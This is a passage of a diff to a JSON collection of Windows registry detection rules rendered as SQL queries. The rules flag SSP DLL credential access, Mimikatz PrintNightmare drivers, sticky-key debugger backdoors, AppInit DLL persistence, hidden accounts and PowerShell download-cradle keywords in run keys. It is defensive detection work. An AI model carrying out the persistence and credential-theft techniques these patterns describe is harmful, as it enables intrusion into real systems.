"7d9263bd-dc47-4a58-bc92-5474abab390c", - "status": "experimental", - "description": "Detects tampering with the \"ChannelAccess\" registry key in order to change access to windows event channel", - "author": "frack113", + "title": "Security Support Provider (SSP) Added to LSA Configuration", + "id": "eeb30123-9fbd-4ee8-aaa0-2e545bbed6dc", + "status": "test", + "description": "Detects the addition of a SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.", + "author": "iwillkeepwatch", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.persistence", + "attack.t1547.005" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ChannelAccess' ESCAPE '\\' AND (NewValue LIKE '%(A;;0x1;;;SY)%' ESCAPE '\\' OR NewValue LIKE '%(A;;0x5;;;BA)%' ESCAPE '\\' OR NewValue LIKE '%(A;;0x1;;;LA)%' ESCAPE '\\')) AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\Security Packages' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\OSConfig\\\\Security Packages' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\')))" ], - "filename": "registry_set_change_winevt_channelaccess.yml" + "filename": "registry_event_ssp_added_lsa_config.yml" }, { - "title": "Suspicious Printer Driver Empty Manufacturer", - "id": "e0813366-0407-449a-9869-a2db1119dc41", + "title": "PrinterNightmare Mimimkatz Driver Name", + "id": "ba6b9e43-1d45-4d3c-a504-1043a64c8469", "status": "test", - "description": "Detects a suspicious printer driver installation with an empty Manufacturer value", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527", + "author": "Markus Neis, @markus_neis, Florian Roth", "tags": [ - "attack.privilege_escalation", - "attack.t1574", - "cve.2021.1675" + "attack.execution", + "attack.t1204", + "cve.2021.1675", + "cve.2021.34527" ], "falsepositives": [ - "Alerts on legitimate printer drivers that do not set any more details in the Manufacturer value" + "Legitimate installation of printer driver QMS 810, Texas Instruments microLaser printer (unlikely)" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Manufacturer%' ESCAPE '\\' AND NewValue = '(Empty)') AND NOT ((TargetObject LIKE '%\\\\CutePDF Writer v4.0\\\\%' ESCAPE '\\') OR ((TargetObject LIKE '%\\\\VNC Printer (PS)\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\VNC Printer (UD)\\\\%' ESCAPE '\\')) OR (TargetObject LIKE '%\\\\Version-3\\\\PDF24\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (((TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers\\\\Version-3\\\\QMS 810\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers\\\\Version-3\\\\mimikatz%' ESCAPE '\\') OR (TargetObject LIKE '%legitprinter%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows%' ESCAPE '\\')) OR ((TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CurrentVersion\\\\Print\\\\Printers%' ESCAPE '\\') AND (TargetObject LIKE '%Gentil Kiwi%' ESCAPE '\\' OR TargetObject LIKE '%mimikatz printer%' ESCAPE '\\' OR TargetObject LIKE '%Kiwi Legit Printer%' ESCAPE '\\'))))" ], - "filename": "registry_set_susp_printer_driver.yml" + "filename": "registry_event_mimikatz_printernightmare.yml" }, { - "title": "Suspicious Powershell In Registry Run Keys", - "id": "8d85cf08-bf97-4260-ba49-986a2a65129c", - "status": "experimental", - "description": "Detects potential PowerShell commands or code within registry run keys", - "author": "frack113, Florian Roth", + "title": "New DLL Added to AppCertDlls Registry Key", + "id": "6aa1d992-5925-4e9f-a49b-845e51d1de01", + "status": "test", + "description": "Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key can be abused to obtain persistence and privilege escalation\nby causing a malicious DLL to be loaded and run in the context of separate processes on the computer.\n", + "author": "Ilyas Ochkov, oscd.community", "tags": [ "attack.persistence", - "attack.t1547.001" + "attack.t1546.009" ], "falsepositives": [ - "Legitimate admin or third party scripts. Baseline according to your environment" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND (NewValue LIKE '%powershell%' ESCAPE '\\' OR NewValue LIKE '%pwsh %' ESCAPE '\\' OR NewValue LIKE '%FromBase64String%' ESCAPE '\\' OR NewValue LIKE '%.DownloadFile(%' ESCAPE '\\' OR NewValue LIKE '%.DownloadString(%' ESCAPE '\\' OR NewValue LIKE '% -w hidden %' ESCAPE '\\' OR NewValue LIKE '% -w 1 %' ESCAPE '\\' OR NewValue LIKE '%-windowstyle hidden%' ESCAPE '\\' OR NewValue LIKE '%-window hidden%' ESCAPE '\\' OR NewValue LIKE '% -nop %' ESCAPE '\\' OR NewValue LIKE '% -encodedcommand %' ESCAPE '\\' OR NewValue LIKE '%-ExecutionPolicy Bypass%' ESCAPE '\\' OR NewValue LIKE '%Invoke-Expression%' ESCAPE '\\' OR NewValue LIKE '%IEX (%' ESCAPE '\\' OR NewValue LIKE '%Invoke-Command%' ESCAPE '\\' OR NewValue LIKE '%ICM -%' ESCAPE '\\' OR NewValue LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR NewValue LIKE '%IWR %' ESCAPE '\\' OR NewValue LIKE '% -noni %' ESCAPE '\\' OR NewValue LIKE '% -noninteractive %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Session Manager\\\\AppCertDlls' ESCAPE '\\' OR NewName LIKE 'HKLM\\\\SYSTEM\\\\CurentControlSet\\\\Control\\\\Session Manager\\\\AppCertDlls' ESCAPE '\\'))" ], - "filename": "registry_set_powershell_in_run_keys.yml" + "filename": "registry_event_new_dll_added_to_appcertdlls_registry_key.yml" }, { - "title": "DNS-over-HTTPS Enabled by Registry", - "id": "04b45a8a-d11d-49e4-9acc-4a1b524407a5", - "status": "test", - "description": "Detects when a user enables DNS-over-HTTPS.\nThis can be used to hide internet activity or be used to hide the process of exfiltrating data.\nWith this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors.\n", - "author": "Austin Songer", + "title": "CMSTP Execution Registry Event", + "id": "b6d235fc-1d38-4b12-adbe-325f06728f37", + "status": "stable", + "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", + "author": "Nik Seetharaman", "tags": [ "attack.defense_evasion", - "attack.t1140", - "attack.t1112" + "attack.execution", + "attack.t1218.003", + "attack.g0069", + "car.2019-04-001" ], "falsepositives": [ - "Unlikely" + "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Edge\\\\BuiltInDnsClientEnabled' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Google\\\\Chrome\\\\DnsOverHttpsMode' ESCAPE '\\' AND NewValue = 'secure') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Mozilla\\\\Firefox\\\\DNSOverHTTPS\\\\Enabled' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\cmmgr32.exe%' ESCAPE '\\')" ], - "filename": "registry_set_dns_over_https_enabled.yml" + "filename": "registry_event_cmstp_execution_by_registry.yml" }, { - "title": "ScreenSaver Registry Key Set", - "id": "40b6e656-4e11-4c0c-8772-c1cc6dae34ce", - "status": "experimental", - "description": "Detects registry key established after masqueraded .scr file execution using Rundll32 through desk.cpl", - "author": "Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)", + "title": "OilRig APT Registry Persistence", + "id": "7bdf2a7c-3acc-4091-9581-0a77dad1c5b5", + "status": "test", + "description": "Detects OilRig registry persistence as reported by Nyotron in their March 2018 report", + "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", "tags": [ + "attack.persistence", + "attack.g0049", + "attack.t1053.005", + "attack.s0111", + "attack.t1543.003", "attack.defense_evasion", - "attack.t1218.011" + "attack.t1112", + "attack.command_and_control", + "attack.t1071.004" ], "falsepositives": [ - "Legitimate use of screen saver" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control Panel\\\\Desktop\\\\SCRNSAVE.EXE%' ESCAPE '\\' AND NewValue LIKE '%.scr' ESCAPE '\\') AND NOT ((NewValue LIKE '%C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\UMe' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\UT' ESCAPE '\\'))" ], - "filename": "registry_set_scr_file_executed_by_rundll32.yml" + "filename": "registry_event_apt_oilrig_mar18.yml" }, { - "title": "Registry Disable System Restore", - "id": "5de03871-5d46-4539-a82d-3aa992a69a83", - "status": "experimental", - "description": "Detects the modification of the registry to disable a system restore on the computer", - "author": "frack113", + "title": "New DLL Added to AppInit_DLLs Registry Key", + "id": "4f84b697-c9ed-4420-8ab5-e09af5b2345d", + "status": "test", + "description": "DLLs that are specified in the AppInit_DLLs value in the Registry key HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows are loaded by user32.dll into every process that loads user32.dll", + "author": "Ilyas Ochkov, oscd.community, Tim Shelton", "tags": [ - "attack.impact", - "attack.t1490" + "attack.persistence", + "attack.t1546.010" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows NT\\\\SystemRestore%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SystemRestore%' ESCAPE '\\') AND (TargetObject LIKE '%DisableConfig' ESCAPE '\\' OR TargetObject LIKE '%DisableSR' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND ((TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit\\_Dlls' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit\\_Dlls' ESCAPE '\\') OR (NewName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit\\_Dlls' ESCAPE '\\' OR NewName LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit\\_Dlls' ESCAPE '\\')) AND NOT (NewValue = '(Empty)'))" ], - "filename": "registry_set_disable_system_restore.yml" + "filename": "registry_event_new_dll_added_to_appinit_dlls_registry_key.yml" }, { - "title": "Add Port Monitor Persistence in Registry", - "id": "944e8941-f6f6-4ee8-ac05-1c224e923c0e", + "title": "Atbroker Registry Change", + "id": "9577edbb-851f-4243-8c91-1d5b50c1a39b", "status": "experimental", - "description": "Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation.\nA port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.\n", - "author": "frack113", + "description": "Detects creation/modification of Assistive Technology applications and persistence with usage of 'at'", + "author": "Mateusz Wydra, oscd.community", "tags": [ + "attack.defense_evasion", + "attack.t1218", "attack.persistence", - "attack.t1547.010" + "attack.t1547" ], "falsepositives": [ - "Unknown" + "Creation of non-default, legitimate at usage" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Print\\\\Monitors\\\\%' ESCAPE '\\' AND NewValue LIKE '%.dll' ESCAPE '\\' AND EventType = 'SetValue') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Print\\\\Monitors\\\\CutePDF Writer Monitor v4.0\\\\Driver%' ESCAPE '\\' AND NewValue LIKE 'cpwmon64\\_v40.dll' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (TargetObject LIKE '%Control\\\\Print\\\\Monitors\\\\MONVNC\\\\Driver%' ESCAPE '\\') OR (TargetObject LIKE '%Control\\\\Print\\\\Environments\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Drivers\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\VNC Printer%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE '%Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Accessibility\\\\ATs%' ESCAPE '\\' OR TargetObject LIKE '%Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Accessibility\\\\Configuration%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\atbroker.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Accessibility\\\\Configuration%' ESCAPE '\\' AND NewValue = '(Empty)') OR (NewProcessName LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Accessibility\\\\ATs%' ESCAPE '\\')))" ], - "filename": "registry_set_add_port_monitor.yml" + "filename": "registry_event_susp_atbroker_change.yml" }, { - "title": "Usage of Renamed Sysinternals Tools - RegistrySet", - "id": "8023f872-3f1d-4301-a384-801889917ab4", - "status": "experimental", - "description": "Detects non-sysinternals tools setting the \"accepteula\" key which normally is set on sysinternals tool execution", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "WINEKEY Registry Modification", + "id": "b98968aa-dbc0-4a9c-ac35-108363cbf8d5", + "status": "test", + "description": "Detects potential malicious modification of run keys by winekey or team9 backdoor", + "author": "omkar72", "tags": [ - "attack.resource_development", - "attack.t1588.002" + "attack.persistence", + "attack.t1547" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\PsExec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsExec64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Backup Mgr' ESCAPE '\\')" ], - "filename": "registry_set_renamed_sysinternals_eula_accepted.yml" + "filename": "registry_event_runkey_winekey.yml" }, { - "title": "Potential Registry Persistence Attempt Via DbgManagedDebugger", - "id": "9827ae57-3802-418f-994b-d5ecf5cd974b", + "title": "Creation of a Local Hidden User Account by Registry", + "id": "460479f3-80b7-42da-9c43-2cc1d54dbccd", "status": "experimental", - "description": "Detects the addition of the \"Debugger\" value to the \"DbgManagedDebugger\" key in order to achieve persistence. Which will get invoked when an application crashes", - "author": "frack113", + "description": "Sysmon registry detection of a local hidden user account.", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1574" + "attack.t1136.001" ], "falsepositives": [ - "Legitimate use of the key to setup a debugger. Which is often the case on developers machines" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\.NETFramework\\\\DbgManagedDebugger' ESCAPE '\\') AND NOT (NewValue LIKE '\"C:\\\\Windows\\\\system32\\\\vsjitdebugger.exe\" PID \\%d APPDOM \\%d EXTEXT \"\\%s\" EVTHDL \\%d' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\SAM\\\\SAM\\\\Domains\\\\Account\\\\Users\\\\Names\\\\%' ESCAPE '\\' AND TargetObject LIKE '%$' ESCAPE '\\' AND NewProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\')" ], - "filename": "registry_set_dbgmanageddebugger_persistence.yml" + "filename": "registry_event_add_local_hidden_user.yml" }, { - "title": "Disable Sysmon Event Logging Via Registry", - "id": "4916a35e-bfc4-47d0-8e25-a003d7067061", - "status": "experimental", - "description": "Detects changes in Sysmon driver altitude. If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.", - "author": "B.Talebi", + "title": "Windows Registry Trust Record Modification", + "id": "295a59c1-7b79-4b47-a930-df12c15fc9c2", + "status": "test", + "description": "Alerts on trust record modification within the registry, indicating usage of macros", + "author": "Antonlovesdnb", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Legitimate driver altitude change to hide sysmon" + "Alerts on legitimate macro usage as well, will need to filter as appropriate" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Instances\\\\Sysmon Instance\\\\Altitude' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%TrustRecords%' ESCAPE '\\')" ], - "filename": "registry_set_change_sysmon_driver_altitude.yml" + "filename": "registry_event_trust_record_modification.yml" }, { - "title": "Disabled RestrictedAdminMode For RDS", - "id": "d6ce7ebd-260b-4323-9768-a9631c8d4db2", - "status": "experimental", - "description": "Detect activation of DisableRestrictedAdmin to desable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromise\n", - "author": "frack113", + "title": "Leviathan Registry Key Activity", + "id": "70d43542-cd2d-483c-8f30-f16b436fd7db", + "status": "test", + "description": "Detects registry key used by Leviathan APT in Malaysian focused campaign", + "author": "Aidan Bracher", "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "falsepositives": [ - "Unknown" + "attack.persistence", + "attack.t1547.001" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\DisableRestrictedAdmin' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE 'HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\ntkd' ESCAPE '\\')" ], - "filename": "registry_set_lsa_disablerestrictedadmin.yml" + "filename": "registry_event_apt_leviathan.yml" }, { - "title": "Winlogon AllowMultipleTSSessions Enable", - "id": "f7997770-92c3-4ec9-b112-774c4ef96f96", + "title": "Sticky Key Like Backdoor Usage - Registry", + "id": "baca5663-583c-45f9-b5dc-ea96a22ce542", "status": "experimental", - "description": "Detects when the 'AllowMultipleTSSessions' value is enabled.\nWhich allows for multiple Remote Desktop connection sessions to be opened at once.\nThis is often used by attacker as a way to connect to an RDP session without disconnecting the other users\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", + "author": "Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community", "tags": [ + "attack.privilege_escalation", "attack.persistence", - "attack.defense_evasion", - "attack.t1112" + "attack.t1546.008", + "car.2014-11-003", + "car.2014-11-008" ], "falsepositives": [ - "Legitimate use of the multi session functionality" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\AllowMultipleTSSessions' ESCAPE '\\' AND NewValue LIKE '%DWORD (0x00000001)' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\sethc.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\utilman.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\osk.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\Magnify.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\Narrator.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\DisplaySwitch.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\atbroker.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\HelpPane.exe\\\\Debugger' ESCAPE '\\'))" ], - "filename": "registry_set_winlogon_allow_multiple_tssessions.yml" + "filename": "registry_event_stickykey_like_backdoor.yml" }, { - "title": "Disable Privacy Settings Experience in Registry", - "id": "0372e1f9-0fd2-40f7-be1b-a7b2b848fa7b", - "status": "experimental", - "description": "Detects registry modifications that disable Privacy Settings Experience", - "author": "frack113", + "title": "Suspicious Camera and Microphone Access", + "id": "62120148-6b7a-42be-8b91-271c04e281a3", + "status": "test", + "description": "Detects Processes accessing the camera and microphone from suspicious folder", + "author": "Den Iuzvyk", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.collection", + "attack.t1125", + "attack.t1123" ], "falsepositives": [ - "Legitimate admin script" + "Unlikely, there could be conferencing software running from a Temp folder accessing the devices" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\OOBE\\\\DisablePrivacyExperience' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\CapabilityAccessManager\\\\ConsentStore\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\NonPackaged%' ESCAPE '\\' AND (TargetObject LIKE '%microphone%' ESCAPE '\\' OR TargetObject LIKE '%webcam%' ESCAPE '\\') AND (TargetObject LIKE '%:#Windows#Temp#%' ESCAPE '\\' OR TargetObject LIKE '%:#$Recycle.bin#%' ESCAPE '\\' OR TargetObject LIKE '%:#Temp#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Public#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Default#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Desktop#%' ESCAPE '\\'))" ], - "filename": "registry_set_disable_privacy_settings_experience.yml" + "filename": "registry_event_susp_mic_cam_access.yml" }, { - "title": "Allow RDP Remote Assistance Feature", - "id": 